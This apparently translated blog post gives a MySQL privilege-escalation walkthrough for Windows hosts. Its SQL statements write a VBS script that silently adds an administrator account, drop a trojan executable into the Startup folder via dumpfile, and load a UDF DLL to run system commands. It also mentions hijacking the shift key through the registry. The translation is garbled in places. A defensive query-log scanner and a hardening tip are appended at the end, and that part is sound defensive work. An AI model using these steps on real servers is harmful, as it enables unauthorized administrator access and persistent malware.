Author: FoolishQiang address: http://hi.baidu.com/foolishqiang/
I have already written a lot about MySQL privilege escalation, but some of my friends connect as root and still cannot execute CMD. Whatever they execute, the server returns:
An error occurred while querying the database. Check whether the SQL statement create function using shell returns string soname udf.dll syntax is correct. Can't open shared library udf.dll (errno: 0)
////////////////////////////////////
In that case we use server components (VBS) for privilege escalation:
///////////////////
Constructed statements:
/////////////////
Create table a (cmd text );
Insert into a values ("set wshshell = createobject (" "wscript. shell "")");
Insert into a values ("a = wshshell. run (" "cmd.exe/c net user foolishqiang/add" ", 0 )");
Insert into a values ("B = wshshell. run (" "cmd.exe/c net localgroup administrators foolishqiang/add" ", 0 )");
///////////////////////
I added the parameter 0, which means the command is executed silently: the CMD window is not displayed and there is no echo.
////////////////////////////////////
The method above, combined with the MySQL privilege escalation I wrote about previously, generally solves the privilege escalation problem. We can also write an exe file in hexadecimal notation.
///////////////////////////
Create table a (cmd BLOB );
Insert into a values (CONVERT (Trojan hexadecimal code, CHAR ));
Select * from a into dumpfile C: \ Documents ents and Settings \ All Users \ Start Menu \ Program start \ foolishqiang.exe
Note: The path must be written \.
//////////////////////////////////////// ///////
To summarise, privilege escalation from root includes DLL privilege escalation, VBS privilege escalation, EXE, and Linx Mysql BackDoor.
If necessary. Dry Point root
And MIX.DLL:
Create table temp_mix (abc longblob );
Insert into temp_mix values (load_file (D: \ udf. dll); // path
Select * from temp_mix into dumpfile C: \ Windows \ system32 \ udf. dll;
Create function MyCmd returns string soname udf. dll;
Select MyCmd (net user );
Drop table if exists temp_mix;
This is generally not used in many cases.
/////////////////
We can also construct statements that hijack shift through the registry, instead of replacing the file (which is protected). Privileges can be escalated this way as well.
I have already mentioned the Root Privilege Escalation method.
You can't laugh
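For defenders, the statements in this post leave a recognisable trail in the MySQL general query log. The following is an added example, not part of the original post: a scanner that flags file writes, load_file reads and UDF registration, then correlates them per connection. The log lines, placeholder paths and the simplified log format are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed, simplified general-query-log lines: timestamp, connection id, command, statement.
SAMPLE_LOG = [
    r"2024-01-01T10:00:01Z 12 Query SELECT id, name FROM shop.products WHERE id = 7",
    r"2024-01-01T10:00:05Z 14 Query create table a (cmd text)",
    r"2024-01-01T10:00:09Z 14 Query select * from a into outfile 'C:\\placeholder\\a.vbs'",
    r"2024-01-01T10:00:12Z 14 Query insert into temp_mix values (load_file('D:\\placeholder\\udf.dll'))",
    r"2024-01-01T10:00:15Z 14 Query select * from temp_mix into dumpfile 'C:\\placeholder\\udf.dll'",
    r"2024-01-01T10:00:18Z 14 Query create function MyCmd returns string soname 'udf.dll'",
    r"2024-01-01T10:00:20Z 15 Query select * from report into outfile 'D:\\placeholder\\report.csv'",
]

LINE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")
RULES = {
    "udf_registration": re.compile(r"\bcreate\s+(?:aggregate\s+)?function\s+\S+\s+returns\s+\w+\s+soname\b", re.I),
    "file_write": re.compile(r"\binto\s+(?:dumpfile|outfile)\s+(['\"])(?P<path>.*?)\1", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
}
RISKY_EXT = re.compile(r"\.(?:dll|exe|vbs|bat|so)$", re.I)

def scan(lines):
    """One finding per rule hit; UDF registration and script/binary writes are rated high."""
    findings = []
    for no, raw in enumerate(lines, 1):
        m = LINE.match(raw)
        if not m:
            continue  # not a Query entry (Connect, Quit, continuation line, ...)
        conn, stmt = int(m.group(2)), m.group(3)
        for rule, rx in RULES.items():
            hit = rx.search(stmt)
            if not hit:
                continue
            severity = "medium"
            if rule == "udf_registration" or (rule == "file_write" and RISKY_EXT.search(hit.group("path"))):
                severity = "high"
            findings.append({"line": no, "conn": conn, "rule": rule, "severity": severity})
    return findings

def chained_connections(findings):
    """Connections that both wrote a file and registered a UDF: the sequence this post describes."""
    seen = defaultdict(set)
    for f in findings:
        seen[f["conn"]].add(f["rule"])
    return sorted(c for c, rules in seen.items() if {"file_write", "udf_registration"} <= rules)

if __name__ == "__main__":
    print(scan(SAMPLE_LOG), chained_connections(scan(SAMPLE_LOG)))
```

On the server itself, secure_file_priv restricts where INTO OUTFILE, INTO DUMPFILE and LOAD_FILE may read or write, and an account without the FILE privilege cannot use them at all.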